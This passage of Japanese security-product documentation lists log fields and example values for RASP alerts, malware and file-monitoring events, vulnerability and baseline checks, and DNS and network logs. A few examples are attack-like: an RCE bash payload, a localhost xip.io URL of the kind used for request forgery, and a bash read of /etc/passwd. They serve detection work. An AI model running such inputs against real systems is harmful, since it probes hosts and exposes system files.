headers | リクエストヘッダーに関する情報。 | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | ホストまたはネットワークデバイスの名前。 | testhostname |
host_ip | ホストのプライベート IP アドレス。 | 172.16.XX.XX |
is_cliped | ログの長さが超過したために切り詰められているかどうかを示します。有効な値:
| false |
jdk_version | JDK バージョン。 | 1.8.0_292 |
message | アラートの説明。 | 安全でないクラスのシリアル化。 |
request_method | リクエストメソッド。 | Post |
platform | オペレーティングシステムの種類。 | Linux |
arch | オペレーティングシステムのアーキテクチャ。 | amd64 |
kernel_version | オペレーティングシステムのカーネルバージョン。 | 3.10.0-1160.59.1.el7.x86_64 |
param | リクエストパラメータ。ほとんどの場合、パラメータは次のいずれかの形式です。
| {"url":["http://127.0.0.1.xip.io"]} |
payload | 攻撃ペイロード。 | bash -c kill -0 -- -'31098' |
payload_length | 攻撃ペイロードの長さ。 | 27 |
rasp_id | ランタイムアプリケーション自己保護 (RASP) エージェントの ID。 | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | RASP エージェントのバージョン。 | 0.8.5 |
src_ip | リクエストが開始された IP アドレス。 | 172.0.XX.XX |
final_action | アラートの処理結果。有効な値:
| block |
rule_action | アプリケーション保護ルールで指定されたアラート処理アクション。有効な値:
| block |
risk_level | リスクレベル。有効な値:
| high |
stacktrace | スタック情報。 | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | アラートが生成された時刻。 | 2023-10-09 15:19:15 |
timestamp | アラートが生成されたタイムスタンプ。単位: ミリ秒。 | 1696835955070 |
type | 攻撃の種類。有効な値:
| rce |
url | リクエスト URL。 | http://127.0.0.1:999/xxx |
rasp_attack_uuid | 攻撃の UUID。 | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | ホストの UUID。 | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | ホストのパブリック IP アドレス。 | 1.2.XX.XX |
intranet_ip | ホストのプライベート IP アドレス。 | 172.16.XX.XX |
sas_group_name | セキュリティセンターでサーバーが属するグループ。 | Group 1 |
instance_id | ホストのインスタンス ID。 | i-wz995eivg28f1m** |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。単位: 秒。 | 1719472214 |
悪意のあるファイル検出ログ
フィールド名 | 説明 | 例 |
bucket_name | OSS バケットの名前。 | ***-test |
event_id | アラートの ID。 | 802210 |
event_name | アラートの名前。 | マイニング プログラム |
md5 | ファイルの MD5 ハッシュ値。 | 6bc2bc******53d409b1 |
sha256 | ファイルの SHA-256 ハッシュ値。 | f038f9525******7772981e87f85 |
result | 検出結果。有効な値:
| 0 |
file_path | ファイルへのパス。 | test.zip/bin_test |
etag | OSS オブジェクトの ID。 | 6BC2B******853D409B1 |
risk_level | リスクレベル。有効な値:
| remind |
source | チェック方法。有効な値:
| OSS |
parent_md5 | 親ファイルまたは圧縮パッケージ ファイルの MD5 ハッシュ値。 | 3d0f8045bb9****** |
parent_sha256 | 親ファイルまたは圧縮パッケージ ファイルの SHA-256 ハッシュ値。 | 69b643d6******a3fb859fa |
parent_file_path | 親ファイルまたは圧縮パッケージ ファイルの名前。 | test.zip |
start_time | イベントが発生した時刻を示す開始タイムスタンプ。単位: 秒。 | 1719472214 |
コアファイル監視イベントログ
フィールド名 | 説明 | 例 |
start_time | イベントが最後に発生したタイムスタンプ。単位:秒。 | 1718678414 |
uuid | サーバーの UUID。 | 5d83b26b-b**a-4**a-9267-12**** |
file_path | ファイルへのパス。 | /etc/passwd |
proc_path | プロセスへのパス。 | /usr/bin/bash |
rule_id | ヒットルールの ID。 | 123 |
rule_name | ルールの名前。 | file_test_rule |
cmdline | コマンドライン。 | bash /opt/a |
operation | ファイルに対して実行する操作。 | READ |
risk_level | リスクレベル。 | 2 |
pid | プロセス ID。 | 45324 |
proc_permission | プロセスを実行するための権限。 | rwxrwxrwx |
instance_id | インスタンス ID。 | i-wz995eivg2**** |
internet_ip | IP アドレス。 | 192.0.2.1 |
intranet_ip | プライベート IP アドレス。 | 172.16.0.1 |
instance_name | インスタンス名。 | aegis-test |
platform | オペレーティングシステムの種類。 | Linux |
エージェントレス検出ログ
脆弱性、ベースライン、および悪意のあるサンプルの共通フィールド
フィールド名 | 説明 | 例 |
uuid | サーバー UUID。 | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | インスタンス ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | アセットのパブリック IP アドレス。 | 39.104.XX.XX |
intranet_ip | アセットのプライベート IP アドレス。 | 192.168.XX.XX |
sas_group_name | セキュリティセンターのサーバーのアセットグループ。 | default |
start_time | 開始タイムスタンプ(秒単位)。イベント発生時刻を示す場合にも使用されます。 | 1719472214 |
脆弱性リスクフィールド
フィールド名 | 説明 | 例 |
vul_name | 脆弱性名。 | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | 脆弱性のエイリアス | gson コード発行の脆弱性 (CVE-2022-25647) |
vul_primary_id | 脆弱性ビジネス プライマリキー ID。 | 990174361 |
type | 脆弱性の種類。有効な値:
| sca |
alert_level | 脆弱性リスクレベル。有効な値:
| asap |
instance_name | ホスト名。 | hhht-linux-*** |
operation | 脆弱性の処理操作。有効な値:
| new |
status | 脆弱性のステータス情報。有効な値:
| 1 |
tag | 脆弱性タグ。有効な値:
説明 他の種類の脆弱性のタグはランダムな文字列です。 | oval |
ベースラインチェックフィールド
フィールド名 | 説明 | 例 |
check_item_name | チェック項目名。 | パスワードの有効期限を設定する |
check_item_level | チェック項目のリスクレベル。有効な値:
| high |
check_type | チェック項目のタイプ。 | ID 認証 |
risk_level | リスク項目レベル。有効な値:
| low |
operation | 操作情報。有効な値:
| new |
risk_name | リスクのあるチェック項目の名前。 | パスワードポリシーコンプライアンス検出 |
status | チェック項目のステータス情報。有効な値:
| 1 |
sub_type_alias_name | サブタイプエイリアス(中国語)。 | Alibaba Cloud 標準 - CentOS Linux 7/8 セキュリティベースライン |
sub_type_name | ベースラインのサブタイプ名。ベースラインのサブタイプの値については、ベースラインのタイプとサブタイプをご参照ください。 | hc_centos7 |
type_name | タイプ名。 | hc_best_secruity |
type_alias_name | タイプエイリアス(中国語)。 | セキュリティベストプラクティス |
container_id | コンテナー ID。 | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | コンテナー名。 | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
悪意のあるサンプルフィールド
フィールド名 | 説明 | 例 |
alert_level | アラートイベントのリスクレベル。有効な値:
| suspicious |
alert_name | 悪意のあるサンプルアラート名。 | Suspicious Process-SSH-based |
operation | 操作情報。有効な値:
| new |
status | 悪意のあるサンプルのリスクステータス情報。有効な値:
| 0 |
suspicious_event_id | アラートイベント ID。 | 909361 |
機密ファイルフィールド
フィールド名 | 説明 | 例 |
alert_level | リスクレベル。有効な値:
| high |
rule_name | ファイルタイプ名。 | ionic token |
file_path | 機密ファイルパス。 | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | チェック結果。 | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
付録
ベースラインの種類とサブタイプ
タイプ | サブタイプ | 説明 |
hc_exploit | hc_exploit_redis | 高リスクのエクスプロイト - Redis の不正アクセス、高エクスプロイト脆弱性リスク |
hc_exploit_activemq | 高リスクのエクスプロイト - ActiveMQ の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_couchdb | 高リスクのエクスプロイト - CouchDB の不正アクセス、高エクスプロイトリスク | |
hc_exploit_docker | 高リスクのエクスプロイト - Docker の不正アクセス、高脆弱性リスク | |
hc_exploit_es | 高リスクのエクスプロイト - Elasticsearch の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_hadoop | 高リスクのエクスプロイト - Hadoop の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_jboss | 高リスクのエクスプロイト - Jboss の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_jenkins | 高リスクのエクスプロイト - Jenkins の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_k8s_api | 高リスクのエクスプロイト - Kubernetes Apiserver の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_ldap | 高リスクのエクスプロイト - LDAP の不正アクセス、高エクスプロイト脆弱性リスク (Windows) | |
hc_exploit_ldap_linux | 高リスクのエクスプロイト - OpenLDAP の不正アクセス脆弱性ベースライン (Linux) | |
hc_exploit_memcache | 高リスクのエクスプロイト - Memcached の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_mongo | 高リスクのエクスプロイト - Mongodb の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_pgsql | 高リスクのエクスプロイト - Postgresql の不正アクセスによる高リスクリスクベースライン | |
hc_exploit_rabbitmq | 高リスクのエクスプロイト - RabbitMQ の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_rsync | 高リスクのエクスプロイト - rsync の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_exploit_tomcat | 高リスクのエクスプロイト - Apache Tomcat AJP ファイル読み取り / 挿入の脆弱性 | |
hc_exploit_zookeeper | 高リスクのエクスプロイト - ZooKeeper の不正アクセス、高エクスプロイト脆弱性リスク | |
hc_container | hc_docker | Alibaba Cloud 標準 - Docker セキュリティベースラインチェック |
hc_middleware_ack_master | Kubernetes (ACK) Master の国際的に合意されたセキュリティのベストプラクティス | |
hc_middleware_ack_node | Kubernetes (ACK) Node の国際的に合意されたセキュリティのベストプラクティス | |
hc_middleware_k8s | Alibaba Cloud 標準 - Kubernetes - Master セキュリティベースラインチェック | |
hc_middleware_k8s_node | Alibaba Cloud 標準 - Kubernetes - Node セキュリティベースラインチェック | |
cis | hc_suse 15_djbh | 中国サイバーセキュリティ等級保護レベル III のための SUSE Linux 15 ベースライン |
hc_aliyun_linux3_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Alibaba Cloud Linux 3 ベースライン | |
hc_aliyun_linux_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Alibaba Cloud Linux / Aliyun Linux 2 ベースライン | |
hc_bind_djbh | 中国のサイバーセキュリティレベル 3 保護 - Bind コンプライアンスベースラインチェック | |
hc_centos 6_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための CentOS Linux 6 ベースライン | |
hc_centos 7_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための CentOS Linux 7 ベースライン | |
hc_centos 8_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための CentOS Linux 8 ベースライン | |
hc_debian_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Debian Linux 8 / 9 / 10 ベースライン | |
hc_iis_djbh | 中国サイバーセキュリティ等級保護レベル III のための IIS ベースライン | |
hc_informix_djbh | 中国のサイバーセキュリティレベル 3 保護 - Informix コンプライアンスベースラインチェック | |
hc_jboss_djbh | 中国のサイバーセキュリティレベル 3 保護 - Jboss 6 / 7 コンプライアンスベースラインチェック | |
hc_mongo_djbh | 中国サイバーセキュリティ等級保護レベル III のための MongoDB ベースライン | |
hc_mssql_djbh | 中国のサイバーセキュリティレベル 3 保護 - SQL Server コンプライアンスベースラインチェック | |
hc_mysql_djbh | 等級保護レベル 3 - MySql コンプライアンスベースラインチェック | |
hc_nginx_djbh | 等級保護レベル 3 - Nginx コンプライアンスベースラインチェック | |
hc_oracle_djbh | 中国のサイバーセキュリティレベル 3 保護 - Oracle コンプライアンスベースラインチェック | |
hc_pgsql_djbh | レベル 3 - PostgreSql コンプライアンスベースラインチェック | |
hc_redhat 6_djbh_l3 | 中国のサイバーセキュリティレベル 3 保護 - Red Hat Enterprise Linux 6 コンプライアンスベースラインチェック | |
hc_redhat_djbh_l3 | 中国のサイバーセキュリティレベル 3 保護 - Red Hat Enterprise Linux 7 コンプライアンスベースラインチェック | |
hc_redis_djbh | 中国サイバーセキュリティ等級保護レベル III のための Redis ベースライン | |
hc_suse 10_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための SUSE Linux 10 ベースライン | |
hc_suse 12_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための SUSE Linux 12 ベースライン | |
hc_suse_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための SUSE Linux 11 ベースライン | |
hc_ubuntu 14_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Ubuntu 14 ベースライン | |
hc_ubuntu_djbh_l3 | レベル 3 - Ubuntu 16 / 18 / 20 コンプライアンス規制検査待ち | |
hc_was_djbh | 中国のサイバーセキュリティレベル 3 保護 - Websphere Application Server コンプライアンスベースラインチェック | |
hc_weblogic_djbh | 中国サイバーセキュリティ等級保護レベル III のための Weblogic ベースライン | |
hc_win 2008_djbh_l3 | 中国のサイバーセキュリティレベル 3 保護 - Windows Server 2008 R2 コンプライアンスベースラインチェック | |
hc_win 2012_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Windows 2012 R2 ベースライン | |
hc_win 2016_djbh_l3 | 中国サイバーセキュリティ等級保護レベル III のための Windows 2016 / 2019 ベースライン | |
hc_aliyun_linux_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Alibaba Cloud Linux / Aliyun Linux 2 ベースライン | |
hc_centos 6_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための CentOS Linux 6 ベースライン | |
hc_centos 7_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための CentOS Linux 7 ベースライン | |
hc_debian_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Debian Linux 8 ベースライン | |
hc_redhat 7_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Redhat Linux 7 ベースライン | |
hc_ubuntu_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Linux Ubuntu 16 / 18 ベースライン | |
hc_win 2008_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Windows 2008 R2 ベースライン | |
hc_win 2012_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Windows 2012 R2 ベースライン | |
hc_win 2016_djbh_l2 | 中国サイバーセキュリティ等級保護レベル II のための Windows 2016 / 2019 ベースライン | |
hc_aliyun_linux_cis | Alibaba Cloud Linux 2 の国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 6_cis_rules | CentOS Linux 6 LTS の国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 7_cis_rules | CentOS Linux 7 LTS の国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 8_cis_rules | CentOS Linux 8 LTS の国際的に合意されたセキュリティのベストプラクティス | |
hc_debian 8_cis_rules | Debian Linux 8 の国際的に合意されたセキュリティのベストプラクティス | |
hc_ubuntu 14_cis_rules | Ubuntu 14 LTS の国際的に合意されたセキュリティのベストプラクティス | |
hc_ubuntu 16_cis_rules | Ubuntu 16 / 18 / 20 LTS の国際的に合意されたセキュリティのベストプラクティス | |
hc_win 2008_cis_rules | Windows Server 2008 R2 の国際的に合意されたセキュリティのベストプラクティス | |
hc_win 2012_cis_rules | Windows Server 2012 R2 の国際的に合意されたセキュリティのベストプラクティス | |
hc_win 2016_cis_rules | Windows Server 2016 / 2019 R2 の国際的に合意されたセキュリティのベストプラクティス | |
hc_kylin_djbh_l3 | 中国のサイバーセキュリティレベル 3 保護 - Kylin コンプライアンスベースラインチェック | |
hc_uos_djbh_l3 | 中国のサイバーセキュリティレベル 3 保護 - uos コンプライアンスベースラインチェック | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux / Aliyun Linux 2 ベンチマーク |
hc_centos 6 | Alibaba Cloud 標準 - CentOS Linux 6 セキュリティベースラインチェック | |
hc_centos 7 | Alibaba Cloud 標準 - CentOS Linux 7 / 8 セキュリティベースラインチェック | |
hc_debian | Alibaba Cloud 標準 - Debian Linux 8 / 9 / 10 セキュリティベースライン | |
hc_redhat 6 | Alibaba Cloud 標準 - Red Hat Enterprise Linux 6 セキュリティベースラインチェック | |
hc_redhat 7 | Alibaba Cloud 標準 - Red Hat Enterprise Linux 7 / 8 セキュリティベースラインチェック | |
hc_ubuntu | Alibaba Cloud 標準 - Ubuntu セキュリティベースライン | |
hc_windows_2008 | Alibaba Cloud 標準 - Windows Server 2008 R2 セキュリティベースラインチェック | |
hc_windows_2012 | Alibaba Cloud 標準 - Windows 2012 R2 セキュリティベースライン | |
hc_windows_2016 | Alibaba Cloud 標準 - Windows 2016 / 2019 セキュリティベースライン | |
hc_db_mssql | Alibaba Cloud 標準 - SQL Server セキュリティベースラインチェック | |
hc_memcached_ali | Alibaba Cloud 標準 - Memcached セキュリティベースラインチェック | |
hc_mongodb | Alibaba Cloud 標準 - MongoDB バージョン 3.x セキュリティベースラインチェック | |
hc_mysql_ali | Alibaba Cloud 標準 - Mysql セキュリティベースラインチェック | |
hc_oracle | Alibaba Cloud 標準 - Oracle 11g セキュリティベースラインチェック | |
hc_pgsql_ali | Alibaba Cloud 標準 - PostgreSql セキュリティ初期化チェック | |
hc_redis_ali | Alibaba Cloud 標準 - Redis セキュリティベースラインチェック | |
hc_apache | Alibaba Cloud 標準 - Apache セキュリティベースラインチェック | |
hc_iis_8 | Alibaba Cloud 標準 - IIS 8 セキュリティベースラインチェック | |
hc_nginx_linux | Alibaba Cloud 標準 - Nginx セキュリティベースラインチェック | |
hc_suse 15 | Alibaba Cloud 標準 - SUSE Linux 15 セキュリティベースラインチェック | |
tomcat 7 | Alibaba Cloud 標準 - Apache Tomcat セキュリティベースライン | |
weak_password | hc_mongodb_pwd | 脆弱なパスワード - MongoDB 脆弱なパスワードベースライン (バージョン 2.X をサポート) |
hc_weakpwd_ftp_linux | 脆弱なパスワード - FTP ログインの脆弱なパスワードベースライン | |
hc_weakpwd_linux_sys | 脆弱なパスワード - Linux システムログインの脆弱なパスワードベースライン | |
hc_weakpwd_mongodb 3 | 脆弱なパスワード - MongoDB 脆弱なパスワードベースライン | |
hc_weakpwd_mssql | 脆弱なパスワード - SQL Server DB ログインの脆弱なパスワードベースライン | |
hc_weakpwd_mysql_linux | 脆弱なパスワード - Mysql DB ログインの脆弱なパスワードベースライン | |
hc_weakpwd_mysql_win | 脆弱なパスワード - Mysql DB ログインの脆弱なパスワードベースライン (Windows バージョン) | |
hc_weakpwd_openldap | 脆弱なパスワード - Openldap ログインの脆弱なパスワードベースライン | |
hc_weakpwd_oracle | 脆弱なパスワード - Oracle ログインの脆弱なパスワード検出 | |
hc_weakpwd_pgsql | 脆弱なパスワード - PostgreSQL DB ログインの脆弱なパスワードベースライン | |
hc_weakpwd_pptp | 脆弱なパスワード - pptpd ログインの脆弱なパスワードベースライン | |
hc_weakpwd_redis_linux | 脆弱なパスワード - Redis DB ログインの脆弱なパスワードベースライン | |
hc_weakpwd_rsync | 脆弱なパスワード - rsync ログインの脆弱なパスワードベースライン | |
hc_weakpwd_svn | 脆弱なパスワード - svn ログインの脆弱なパスワードベースライン | |
hc_weakpwd_tomcat_linux | 脆弱なパスワード - Apache Tomcat コンソールの脆弱なパスワードベースライン | |
hc_weakpwd_vnc | 脆弱なパスワード - VncServer 脆弱なパスワードチェック | |
hc_weakpwd_weblogic | 脆弱なパスワード - Weblogic 12c ログインの脆弱なパスワード検出 | |
hc_weakpwd_win_sys | 脆弱なパスワード - Windows システムログインの脆弱なパスワードベースライン |
ネットワークログフィールド
Web アクセスログ
フィールド名 | 説明 | 例 |
response_content_length | メッセージ本文の長さ。単位:バイト。 | 612 |
dst_ip | 宛先ホストの IP アドレス。 | 39.105.XX.XX |
dst_port | 宛先ホストのポート。 | 80 |
host | 宛先ホストの IP アドレスまたはドメイン名。 | 39.105.XX.XX |
jump_location | リダイレクトアドレス。 | 123 |
request_method | HTTP リクエストメソッド。 | GET |
http_referer | HTTP リファラー。このフィールドには、リクエストされているリソースにリンクされている Web ページの URL が含まれています。 | www.example.com |
request_datetime | リクエストが開始された時刻。 | 2024-08-01 06:59:28 |
status | HTTP ステータスコード。 | 200 |
content_type | リクエストコンテンツのタイプ。 | text/plain;charset=utf-8 |
response_content_type | レスポンスコンテンツのタイプ。 | text/plain; charset=utf-8 |
src_ip | 送信元 IP アドレス。 | 31.220.XX.XX |
src_port | 送信元ポート。 | 59524 |
request_uri | リクエスト URI。 | /report |
http_user_agent | リクエストを開始したユーザーエージェント。 | okhttp/3.2.0 |
http_x_forward_for | クライアントの送信元 IP アドレスを記録する HTTP リクエストヘッダー。 | 31.220.XX.XX |
DNS ログ
フィールド名 | 説明 | 例 |
additional | DNS サーバによって返される追加フィールド。CNAME レコード、MX レコード、PTR レコードなどの情報が記録されます。 | 該当なし |
additional_num | DNS サーバによって返される追加レコードの数。 | 0 |
answer | DNS サーバによって返される DNS 応答。解決結果を示します。DNS 応答には、リクエストされたドメイン名が解決される IP アドレス、または A レコードや AAAA レコードなどのその他の情報が含まれます。 | example.com A IN 52 1.2.XX.XX |
answer_num | DNS 応答の数。 | 1 |
authority | DNS サーバによって返される権限フィールド。権限とは、ドメイン名を管理および解決する DNS サーバです。権限フィールドには、リクエストされたドメイン名の DNS レコード(NS レコードなど)を提供する DNS サーバに関する情報が含まれます。 | NS IN 17597 |
authority_num | 権限の数。 | 1 |
client_subnet | クライアントのサブネット。 | 59.152.XX.XX |
dst_ip | 宛先 IP アドレス。 | 106.55.XX.XX |
dst_port | 宛先ポート。 | 53 |
net_connect_dir | データ転送の方向。有効な値:
| out |
qid | クエリの ID。 | 13551 |
query_name | クエリ対象のドメイン名。 | example.com |
query_type | クエリの種類。 | A |
query_datetime | クエリの実行時刻。 | 2024-08-01 08:33:58 |
rcode | DNS サーバによって返される応答コード。DNS 解決結果を示します。 | 0 |
region | ソースリージョンの ID。有効な値:
| 1 |
response_datetime | DNS サーバの応答時間。 | 2024-08-01 08:31:25 |
src_ip | 送信元 IP アドレス。 | 106.11.XX.XX |
src_port | 送信元ポート。 | 22 |
ネットワークセッションログ
フィールド名 | 説明 | 例 |
asset_type | ログが収集されるアセットのタイプ。有効な値:
| ECS |
dst_ip | 宛先 IP アドレス。 | 119.96.XX.XX |
dst_port | 宛先ポート。 | 443 |
net_connect_dir | セッションの方向。値は out に固定されています。
| out |
l4_proto | プロトコルのタイプ。有効な値:
| tcp |
session_time | セッションが開始された時刻。 | 2024-08-01 08:31:18 |
src_ip | 送信元 IP アドレス。 | 121.40.XX.XX |
src_port | 送信元ポート。 | 53602 |
ローカル DNS ログ
フィールド名 | 説明 | 例 |
anwser_name | DNS 応答の名前。リソースレコードに関連付けられているドメイン名を示します。 | example.com |
answer_rdata | DNS 応答のリソースデータエリア (RDA) フィールド。解決結果の具体的な値を示します。 | 106.11.XX.XX |
answer_ttl | DNS 応答の生存時間 (TTL)。単位:秒。 | 600 |
answer_type | DNS 応答のタイプ。有効な値:
| 1 |
dst_ip | 宛先 IP アドレス。値はデフォルトで 10 進数 の IP アドレスです。 | 323223**** |
dst_port | 宛先ポート。 | 53 |
group_id | グループ ID 。同じグループ ID は、同じ DNS リクエストまたは応答を示します。 | 3 |
host | ホストの名前。 | hostname |
id | クエリの ID 。DNS リクエストまたは DNS 応答を識別します。 | 64588 |
instance_id | インスタンスの ID。 | i-2zeg4zldn8zypsfg**** |
internet_ip | DNS リクエストまたは応答に含まれるパブリック IP アドレス。 | 121.40.XX.XX |
ip_ttl | DNS リクエストまたは応答における IP パケットの TTL 。 | 64 |
query_name | クエリ対象のドメイン名。 | example.com |
query_type | クエリのタイプ。有効な値:
| 1 |
src_ip | DNS リクエストまたは応答が開始された IP アドレス。値はデフォルトで 10 進数 の IP アドレスです。 | 168427**** |
src_port | DNS リクエストまたは応答が開始されたポートの番号。 | 53 |
start_time | 開始タイムスタンプ。イベントが発生した時刻を示します。単位:秒。 | 1719472214 |
time_usecond | DNS リクエストまたは応答のタイムスタンプ。単位:マイクロ秒。 | 590662 |
tunnel_id | DNS リクエストまたは応答で使用されるトンネルの ID 。トンネリングとは、異なるプロトコルを使用してデータを転送する方法です。トンネリングは、インターネットへの安全なアクセスや、異なるネットワーク間の通信に使用できます。 | 514763 |